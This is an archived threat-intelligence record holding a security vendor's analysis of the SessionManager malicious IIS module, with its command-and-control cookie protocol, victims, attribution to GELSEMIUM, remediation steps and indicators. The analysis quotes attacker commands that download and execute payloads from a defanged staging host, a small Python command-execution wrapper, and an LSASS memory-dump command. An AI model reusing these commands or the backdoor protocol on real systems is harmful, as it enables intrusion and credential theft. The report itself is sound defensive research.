{
	"id": "1432fef3-7e28-4960-b6ee-45c0b5e883cf",
	"created_at": "2026-04-06T00:14:26.643121Z",
	"updated_at": "2026-04-10T13:12:41.47318Z",
	"deleted_at": null,
	"sha1_hash": "cfc313980665c4ad34e2576b7aed8954c7d89631",
	"title": "The SessionManager IIS backdoor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 315255,
	"plain_text": "The SessionManager IIS backdoor\r\nBy Pierre Delcher\r\nPublished: 2022-06-30 · Archived: 2026-04-05 17:19:34 UTC\r\nFollowing on from our earlier Owowa discovery, we continued to hunt for more backdoors potentially set up as\r\nmalicious modules within IIS, a popular web server edited by Microsoft. And we didn’t come back empty-handed…\r\nIn 2021, we noticed a trend among several threat actors for deploying a backdoor within IIS after exploiting one of\r\nthe ProxyLogon-type vulnerabilities within Microsoft Exchange servers. Dropping an IIS module as a backdoor\r\nenables threat actors to maintain persistent, update-resistant and relatively stealthy access to the IT infrastructure\r\nof a targeted organization; be it to collect emails, update further malicious access, or clandestinely manage\r\ncompromised servers that can be leveraged as malicious infrastructure.\r\nIn early 2022, we investigated one such IIS backdoor: SessionManager. In late April 2022, most of the samples we\r\nidentified were still not flagged as malicious in a popular online file scanning service, and SessionManager was\r\nstill deployed in over 20 organizations.\r\nSessionManager has been used against NGOs, government, military and industrial organizations in Africa, South\r\nAmerica, Asia, Europe, Russia and the Middle East, starting from at least March 2021. 
Because of the similar\r\nvictims, and use of a common OwlProxy variant, we believe the malicious IIS module may have been leveraged\r\nby the GELSEMIUM threat actor, as part of espionage operations.\r\nSessionManager: there’s yet another unwanted module in your web server\r\nDeveloped in C++, SessionManager is a malicious native-code IIS module whose aim is to be loaded by some IIS\r\napplications, to process legitimate HTTP requests that are continuously sent to the server.\r\nSuch malicious modules usually expect seemingly legitimate but specifically crafted HTTP requests from their\r\noperators, trigger actions based on the operators’ hidden instructions if any, then transparently pass the request to\r\nthe server for it to be processed just like any other request (see Figure 1).\r\nAs a result, such modules are not easily spotted by usual monitoring practices: they do not necessarily initiate\r\nsuspicious communications to external servers, receive commands through HTTP requests to a server that is\r\nspecifically exposed to such processes, and their files are often placed in overlooked locations that contain a lot of\r\nother legitimate files.\r\nhttps://securelist.com/the-sessionmanager-iis-backdoor/106868/\r\nPage 1 of 10\n\nFigure 1. Malicious IIS module processing requests\r\nSessionManager offers the following capabilities that, when combined, make it a lightweight persistent initial\r\naccess backdoor:\r\nReading, writing to and deleting arbitrary files on the compromised server.\r\nExecuting arbitrary binaries from the compromised server, also known as “remote command execution”.\r\nEstablishing connections to arbitrary network endpoints that can be reached by the compromised server, as\r\nwell as reading and writing in such connections.\r\nWe identified several variants of the SessionManager module, all including remains of their development\r\nenvironment (PDB paths) and compilation dates that are consistent with observed activity timeframes. 
This\r\ndemonstrates a continuous effort to update the backdoor:\r\nV0: the compilation date of the oldest sample we identified (MD5\r\n5FFC31841EB3B77F41F0ACE61BECD8FD) is from March 2021. The sample contains a development\r\npath (PDB path): “C:UsersGodLikeDesktoptt4StripHeaders-masterx64Releasesessionmanagermodule.pdb”. This indicates the SessionManager developer might have\r\nused the public source code of the StripHeaders IIS module as a template to first design SessionManager.\r\nV1: a later sample (MD5 84B20E95D52F38BB4F6C998719660C35) has a compilation date from April\r\n2021, and a PDB path set as\r\n“C:UsersGodLikeDesktoptt4SessionManagerModulex64Releasesessionmanagermodule.pdb”.\r\nV2: another sample (MD5 4EE3FB2ABA3B82171E6409E253BDDDB5) has a compilation date from\r\nAugust 2021, and a PDB path which is identical to the previous V1, except for the project folder name\r\nwhich is “SessionManagerV2Module”.\r\nV3: finally, the last sample we could identify (MD5 2410D0D7C20597D9B65F237F9C4CE6C9) is dated\r\nfrom September 2021 and has a project folder name set to “SessionManagerV3Module”.\r\nSessionManager command and control protocol details\r\nSessionManager hooks itself in the HTTP communications processing of the web server by checking HTTP data\r\njust before IIS answers to an HTTP request (see Figure 2). In this specific step of HTTP processing,\r\nSessionManager can check the whole content of the HTTP request from a client (an operator), and modify the\r\nanswer that is sent to the client by the server (to include results from backdoor activities), as previously shown in\r\nFigure 1.\r\nFigure 2. SessionManager registration within the web server upon loading\r\nCommands are passed from an operator to SessionManager using a specific HTTP cookie name. The answer from\r\nthe backdoor to an operator will usually be inserted in the body of the server HTTP response. 
If the expected\r\ncookie name and value format are not found in an HTTP request from a client, the backdoor will do nothing, and\r\nprocessing will continue as if the malicious module did not exist.\r\nThe specific HTTP cookie name that is checked by SessionManager is “SM_SESSIONID” in variants before V2\r\n(excluded), and “SM_SESSION” after. Formatting the exact command names and arguments also depends on the\r\nbackdoor variant:\r\nBefore V2 (excluded), most of the commands and associated parameters are all passed as a value[1] of the\r\nrequired SessionManager HTTP cookie, such as for a file reading command:\r\nCookie: SM_SESSIONID=ReadFile-afile.txt\r\nThe remote execution and the file writing functionalities require additional command data to be passed\r\nwithin the HTTP request body.\r\nAfter V2 (included), only the command name is passed as a value of the required SessionManager HTTP\r\ncookie. Command parameters are passed using names and values[2] of additional cookies, while some\r\ncommands still require data to be passed within the HTTP body as well. For example, the HTTP cookies\r\ndefinition for a file-reading command looks like this:\r\nCookie: SM_SESSION=GETFILE;FILEPATH=afile.txt;\r\nThe results of executed commands are returned as body data within HTTP responses. Before V2 (excluded),\r\nSessionManager did not encrypt or obfuscate command and control data. Starting with V2 (included), an\r\nadditional “SM_KEY” cookie can be included in HTTP requests from operators: if so, its value will be used as an\r\nXOR key to encode results that are sent by SessionManager.\r\nThe comprehensive list of commands for the most recent variant of SessionManager is presented below:\r\nCommand name\r\n(SM_SESSION\r\ncookie value)\r\nCommand parameters\r\n(additional cookies)\r\nAssociated capability\r\nGETFILE\r\nFILEPATH: path of file\r\nto be read. 
FILEPOS1:\r\noffset at which to start\r\nreading, from file start.\r\nFILEPOS2: maximum\r\nnumber of bytes to read.\r\nRead the content of a file on the compromised server and\r\nsend it to the operator as an HTTP binary file named\r\ncool.rar.\r\nPUTFILE\r\nFILEPATH: path of file\r\nto be written.\r\nFILEPOS1: offset at\r\nwhich to start writing.\r\nFILEPOS2: offset\r\nreference.\r\nFILEMODE: requested\r\nfile access type.\r\nWrite arbitrary content to a file on the compromised server.\r\nThe data to be written in the specified file is passed within\r\nthe HTTP request body.\r\nDELETEFILE\r\nFILEPATH: path of file\r\nto be deleted.\r\nDelete a file on the compromised server.\r\nFILESIZE\r\nFILEPATH: path of file\r\nto be measured.\r\nGet the size (in bytes) of the specified file.\r\nCMD None.\r\nRun an arbitrary process on the compromised server. The\r\nprocess to run and its arguments are specified in the HTTP\r\nrequest body using the format: \u003cexecutable\r\npath\u003et\u003carguments\u003e. The standard output and error data\r\nfrom process execution are sent back as plain text to the\r\noperator in the HTTP response body.\r\nPING None.\r\nCheck for SessionManager deployment. The “Wokring\r\nOK” (sic.) message will be sent to the operator in the\r\nHTTP response body.\r\nS5CONNECT\r\nS5HOST: hostname to\r\nconnect to (exclusive\r\nwith S5IP).\r\nS5PORT: offset at which\r\nto start writing.\r\nS5IP: IP address to\r\nconnect to if no\r\nhostname is given\r\n(exclusive with\r\nS5HOST).\r\nS5TIMEOUT: maximum\r\ndelay in seconds to allow\r\nfor connection.\r\nConnect from compromised host to a specified network\r\nendpoint, using a created TCP socket. 
The integer\r\nidentifier of the created and connected socket will be\r\nreturned as the value of the S5ID cookie variable in the\r\nHTTP response, and the status of the connection will be\r\nreported in the HTTP response body.\r\nS5WRITE\r\nS5ID: identifier of the\r\nsocket to write to, as\r\nreturned by\r\nS5CONNECT.\r\nWrite data to the specified connected socket. The data to\r\nbe written in the specified socket is passed within the\r\nHTTP request body.\r\nS5READ\r\nS5ID: identifier of the\r\nsocket to read from, as\r\nreturned by\r\nS5CONNECT.\r\nRead data from the specified connected socket. The read\r\ndata is sent back within the HTTP response body.\r\nS5CLOSE\r\nS5ID: identifier of the\r\nsocket to close, as\r\nreturned by\r\nS5CONNECT.\r\nTerminate an existing socket connection. The status of the\r\noperation is returned as a message within the HTTP\r\nresponse body.\r\nPost-deployment activities by SessionManager operators\r\nOnce deployed, SessionManager is leveraged by operators to further profile the targeted environment, gather in-memory passwords and deploy additional tools. Notably, operators used Powershell WebClient functionality from\r\na SessionManager remote execution command to download from the server IP address 202.182.123[.]185,\r\nbetween March and April 2021, such as:\r\npowershell \"(New-Object\r\nNet.WebClient).DownloadFile('hxxp://202.182.123[.]185/Dll2.dll','C:WindowsTempwin32.dll')\"\r\npowershell \"(New-Object\r\nNet.WebClient).DownloadFile('hxxp://202.182.123[.]185/ssp.exe','C:WindowsTempwin32.exe')\"\r\nC:WindowsTempwin32.exe C:WindowsTempwin32.dll\r\nAdditional tools that operators attempted to download and execute from SessionManager include a PowerSploit-based reflective loader for the Mimikatz DLL, Mimikatz SSP, ProcDump, as well as a legitimate memory dump\r\ntool from Avast (MD5 36F2F67A21745438A1CC430F2951DFBC). 
The latter has been abused by\r\nSessionManager operators to attempt to read the memory of the LSASS process, which would enable\r\nauthentication secrets collection on the compromised server. Operators also tried to leverage the Windows built-in\r\nMinidump capability to do the same thing.\r\nIn order to avoid detection by security products (which obviously failed in our case), SessionManager operators\r\nsometimes attempted additional malicious execution by running launcher scripts through the Windows services\r\nmanager command line. Starting from November 2021, operators tried to leverage custom PyInstaller-packed\r\nPython scripts to obfuscate command execution attempts. This kind of Python script source code would look as\r\nfollows:\r\nimport os, sys, base64, codecs\r\nfrom subprocess import PIPE, Popen\r\ndef cmdlet(c):\r\n      cmdlet = c.split('(-)')\r\n      p = Popen(cmdlet, stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=True)\r\n      _out, _err = p.communicate()\r\n      return (codecs.decode(_out, errors='backslashreplace'), codecs.decode(_out,\r\nerrors='backslashreplace'))\r\nprint('\\n---------------------\\n'.join(cmdlet(sys.argv[1])))\r\nAnd as a result, command execution attempts through this tool were made as follows:\r\nC:WindowsTempvmmsi.exe cmd.exe(-)/c(-)\"winchecksec.exe -accepteula -ma lsass.exe seclog.dmp\"\r\nIn one case in December 2021, SessionManager operators attempted to execute an additional tool that we\r\nunfortunately could not retrieve. 
This tool was set up to communicate with the IP address 207.148.109[.]111,\r\nwhich is most likely part of the operators’ infrastructure.\r\nSessionManager targets\r\nWe managed to identify 34 servers that were compromised by a SessionManager variant, belonging to 24 distinct\r\norganizations in Argentina, Armenia, China, Djibouti, Equatorial Guinea, Eswatini, Hong Kong, Indonesia,\r\nKenya, Kuwait, Malaysia, Nigeria, Pakistan, Poland, the Russian Federation, Saudi Arabia, Taiwan, Thailand,\r\nTurkey, the United Kingdom and Vietnam (see Figure 3).\r\nUsually, we could only identify one compromised server per organization, and only one compromised\r\norganization per location; but Vietnam is the main exception as several compromised servers from several\r\norganizations could be identified there. Amongst the identified organizations, 20 were still running a compromised\r\nserver as late as June 2022.\r\nAdditionally, we managed to identify an earlier target of the same campaign that was not compromised with\r\nSessionManager, in Laos in mid-March 2021 (see Attribution).\r\nFigure 3. 
Map of organizations targeted by SessionManager campaign (darker color indicates a higher\r\nconcentration)\r\nMost of the compromised servers belong to government or military organizations, but we also identified\r\ninternational and national non-government organizations, an electronic equipment manufacturer, a shipbuilding\r\ncompany, a health care and surgery group, a local road transportation company, a state oil company, a state\r\nelectricity company, a sales kiosk manufacturer, and an ERP software editor.\r\nAttribution\r\nFirst, we identified an additional malicious binary (MD5 5F15B17FA0E88D40D4E426E53CF94549, compilation\r\ndate set in April 2020) that shares a common PDB path part with SessionManager samples\r\n(“C:UsersGodLikeDesktopt”). This binary is a password stealer designed to grab Windows users’ passwords when\r\nthey are changed. It is compiled from a Chinese-documented public source code called Hook-PasswordChangeNotify. Unfortunately, we could not retrieve any additional details about this binary exploitation,\r\nbut it may have been developed by the same developer as SessionManager.\r\nThen in mid-March 2021, shortly before our first SessionManager detection, we noticed that a threat actor\r\nleveraged ProxyLogon-type vulnerabilities against an Exchange Server in Laos to deploy a web shell and conduct\r\nmalicious activities using the same Mimikatz SSP and Avast memory dump tools that we described above (see\r\nPost-deployment activities from SessionManager operators). Not only were the tool samples the same, but one of\r\nthem was downloaded from the staging server that SessionManager operators leveraged (202.182.123[.]185). 
As a\r\nresult, we believe with medium to high confidence that those malicious activities were conducted by the same\r\nthreat actor behind SessionManager.\r\nInterestingly, the threat actor attempted to download and execute two samples of an HTTP server-type backdoor\r\ncalled OwlProxy on the compromised server in Laos. We then discovered that at least one of those OwlProxy\r\nsamples had also been downloaded from 202.182.123[.]185 on at least two SessionManager-compromised servers\r\nin late March 2021. As a result, we believe with medium to high confidence that the threat actor who operates\r\nSessionManager also used or tried to use those OwlProxy samples before introducing SessionManager.\r\nThe specific OwlProxy variant of the samples we retrieved has only been documented as part of GELSEMIUM’s\r\nactivities. We also noticed that SessionManager targets (see SessionManager targets) partly overlap with\r\nGELSEMIUM victims. As a result, we believe that SessionManager might be operated by GELSEMIUM, but not\r\nnecessarily only GELSEMIUM.\r\nGetting rid of IIS malicious modules\r\nOnce again, the activities described here show that the ProxyLogon-type vulnerabilities have been widely used\r\nsince March 2021 to deploy relatively simple yet very effective persistent server accesses, such as the\r\nSessionManager backdoor.\r\nWhile some of the ProxyLogon exploitation by advanced threat actors was documented right away, notably by\r\nKaspersky, SessionManager was poorly detected for a year. Facing massive and unprecedented server-side\r\nvulnerability exploitation, most cybersecurity actors were busy investigating and responding to the first identified\r\noffences. 
As a result, it is still possible to discover related malicious activities months or years later, and that will\r\nprobably be the case for a long time.\r\nIn any case, we cannot stress enough that IIS servers must undergo a complete and dedicated investigation process\r\nafter the gigantic opportunity that ProxyLogon-style vulnerabilities exposed, starting in 2021. Loaded IIS modules\r\ncan be listed for a running IIS instance by using the IIS Manager GUI, or from the IIS appcmd command line. If a\r\nmalicious module is identified, we recommend the following template of actions (merely deleting the malicious\r\nmodule file will not be enough to get rid of it):\r\nTake a volatile memory snapshot on the currently running system where IIS is executed. Request assistance\r\nfrom forensics and incident response experts if required.\r\nStop the IIS server, and ideally disconnect the underlying system from publicly reachable networks.\r\nBack up all files and logs from your IIS environment, to retain data for further incident response. Check\r\nthat the backups can be opened or extracted successfully.\r\nUsing IIS Manager or the appcmd command tool, remove every reference of the identified module from\r\napps and server configurations. 
Manually review associated IIS XML configuration files to make sure any\r\nreference to the malicious modules have been removed – manually remove the references in XML files\r\notherwise.\r\nUpdate the IIS server and underlying operating system to make sure no known vulnerabilities remain\r\nexposed to attackers.\r\nRestart the IIS server and bring the system online again.\r\nIt is advised to then proceed with malicious module analysis and incident response activities (from the memory\r\nsnapshot and backups that have been prepared), in order to understand how the identified malicious tools have\r\nbeen leveraged by their operators.\r\nIndicators of Compromise\r\nIP addresses\r\n202.182.123[.]185 (Staging server, between 2021-03 and 04 at least)\r\n207.148.109[.]111 (Unidentified infrastructure)\r\n[1]\r\n As per RFC:2109 (title 4.1) and its successor RFC:2965 (title 3.1), values of HTTP cookies that contain\r\ncharacters such as filepath backslashes should be quoted. SessionManager does not care to comply with\r\nreferenced RFCs, and does not unquote such values, so will fail to process a cookie value that contains filepaths\r\nincluding backslashes as sent by standard HTTP clients.\r\n[2]\r\n The previous cookie value limitations (see footnote 1) still exist with V2+. In addition, any cookie variable\r\ndefinition to be processed by SessionManager V2+ must be terminated with a ‘;’ character, even if there is only\r\none cookie variable set.\r\nSource: https://securelist.com/the-sessionmanager-iis-backdoor/106868/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/the-sessionmanager-iis-backdoor/106868/"
	],
	"report_names": [
		"106868"
	],
	"threat_actors": [
		{
			"id": "2d4d2356-8f9e-464d-afc6-2403ce8cf424",
			"created_at": "2023-01-06T13:46:39.290101Z",
			"updated_at": "2026-04-10T02:00:03.275981Z",
			"deleted_at": null,
			"main_name": "Gelsemium",
			"aliases": [
				"狼毒草"
			],
			"source_name": "MISPGALAXY:Gelsemium",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "77874718-7ad2-4d15-9831-10935ab9bcbe",
			"created_at": "2022-10-25T15:50:23.619911Z",
			"updated_at": "2026-04-10T02:00:05.349462Z",
			"deleted_at": null,
			"main_name": "Gelsemium",
			"aliases": [
				"Gelsemium"
			],
			"source_name": "MITRE:Gelsemium",
			"tools": [
				"Gelsemium",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b5550c4e-943a-45ea-bf67-875b989ee4c4",
			"created_at": "2022-10-25T16:07:23.675771Z",
			"updated_at": "2026-04-10T02:00:04.707782Z",
			"deleted_at": null,
			"main_name": "Gelsemium",
			"aliases": [
				"Operation NightScout",
				"Operation TooHash"
			],
			"source_name": "ETDA:Gelsemium",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agentemis",
				"BadPotato",
				"CHINACHOPPER",
				"China Chopper",
				"Chrommme",
				"Cobalt Strike",
				"CobaltStrike",
				"FireWood",
				"Gelsemine",
				"Gelsenicine",
				"Gelsevirine",
				"JuicyPotato",
				"OwlProxy",
				"Owowa",
				"SAMRID",
				"SessionManager",
				"SinoChopper",
				"SpoolFool",
				"SweetPotato",
				"WolfsBane",
				"cobeacon",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434466,
	"ts_updated_at": 1775826761,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cfc313980665c4ad34e2576b7aed8954c7d89631.pdf",
		"text": "https://archive.orkl.eu/cfc313980665c4ad34e2576b7aed8954c7d89631.txt",
		"img": "https://archive.orkl.eu/cfc313980665c4ad34e2576b7aed8954c7d89631.jpg"
	}
}